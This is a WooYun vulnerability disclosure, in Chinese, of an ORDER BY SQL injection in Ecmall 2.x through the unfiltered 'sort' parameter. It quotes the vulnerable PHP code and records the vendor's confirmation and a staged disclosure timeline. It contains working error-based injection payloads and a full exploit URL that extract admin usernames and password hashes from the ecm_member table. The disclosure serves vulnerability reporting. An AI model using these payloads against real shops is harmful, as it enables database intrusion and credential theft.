当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038213

漏洞标题:Ecmall 2.x版本存在通杀SQL注入漏洞

相关厂商:ShopEx

漏洞作者: Chora

提交时间:2013-09-26 10:50

修复时间:2013-12-25 10:50

公开时间:2013-12-25 10:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-26: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-09-29: 细节向第三方安全合作伙伴开放
2013-11-20: 细节向核心白帽子及相关领域专家公开
2013-11-30: 细节向普通白帽子公开
2013-12-10: 细节向实习白帽子公开
2013-12-25: 细节向公众公开

简要描述:

本来想早点分析完然后奋斗ECSHOP...结果一直不给老衲机会啊,越来越不敢相信是不是官方版本了,是不是下错了.酒喝多了头有点晕.不知道有没有把分析写错...

详细说明:

order by 参数注入,后面不能跟union,但是可以用双重查询.
select...from...order by 1 and (select user_name from ecm_member where user_id=1)
或者
select...from...order by 1,(select user_name from ecm_member where user_id=1)
但是在第2个select里面可以用union
select...from...order by 1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)

select...from...order by 1,(select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)
app/my_goods.app.php

function index()
    {
        /* 取得店铺商品分类 */
        $this->assign('sgcategories', $this->_get_sgcategory_options());
        $conditions = $this->_get_conditions();
        $page = $this->_get_page();
        $page_nolimit = array();
        $goods_list = $this->_get_goods($conditions, $page); //跟进
        $all_goods = $this->_get_goods($conditions, $page_nolimit);      
......
    }
    function _get_goods($conditions, &$page)
    {
        if (intval($_GET['sgcate_id']) > 0)
        {
            $cate_mod =& bm('gcategory', array('_store_id' => $this->_store_id));
            $cate_ids = $cate_mod->get_descendant_ids(intval($_GET['sgcate_id']));
        }
        else
        {
            $cate_ids = 0;
        }
        // 标识有没有过滤条件
        if ($conditions != '1 = 1' || !empty($_GET['sgcate_id']))
        {
            $this->assign('filtered', 1);
        }
        //更新排序
        if (isset($_GET['sort']) && isset($_GET['order']))
        {
            $sort  = strtolower(trim($_GET['sort'])); //未过滤
            $order = strtolower(trim($_GET['order']));
            if (!in_array($order,array('asc','desc'))) //只限制了order,没有限制sort
            {
                $sort  = 'goods_id';
                $order = 'desc';
            }
        }
        else
        {
            $sort  = 'goods_id';
            $order = 'desc';
        }
        
        if ($page)
        {
            $limit = $page['limit'];
            $count = true;
        }
        else
        {
            $limit = '';
            $count = false;
        }
        /* 取得商品列表 */
        
        $goods_list = $this->_goods_mod->get_list(array(
            'conditions' => $conditions,
            'count' => $count,
            'order' => "$sort $order", //select...from...order by 注入
            'limit' => $limit,
        ), $cate_ids);
        return $goods_list;
    }


includes/models/goods.model.php

function get_list($params = array(), $scate_ids = array(), $desc = false, $no_picture = true)
    {
        is_int($scate_ids) && $scate_ids > 0 && $scate_ids = array($scate_ids);
        extract($this->_initFindParams($params));//将上面数组的键名作为变量名,值作为变量的值(包含$order变量).
......
        /* 条件(WHERE) */
        $conditions = $this->_getConditions($conditions, true);
        $conditions .= " AND gs.spec_id IS NOT NULL AND s.store_id IS NOT NULL ";
        if ($scate_ids)
        {
......
        }
        /* 排序(ORDER BY) */
        if ($order)
        {
            $order = ' ORDER BY ' . $this->getRealFields($order) . ', s.sort_order '; //跟进
        }
        /* 分页(LIMIT) */
        $limit && $limit = ' LIMIT ' . $limit;
        if ($count)
        {
            $this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}");
        }
        /* 完整的SQL */
        $this->temp = $tables . $conditions;
        $sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}";
        $goods_list = $index_key ? $this->db->getAllWithIndex($sql, $index_key) : $this->db->getAll($sql); //带入查询
......
    }


eccore/model/model.base.php

function getRealFields($src_fields_list)
    {
        $fields = $src_fields_list;
        if (!$src_fields_list)
        {
            $fields = '';
        }
        $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields); //正则无影响...
        return $fields;
    }


http://localhost/ecmall/index.php?app=my_goods&act=index&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

漏洞证明:

1.jpg

修复方案:

过滤...

版权声明:转载请注明来源 Chora@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-09-26 10:55

厂商回复:

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

最新状态:

暂无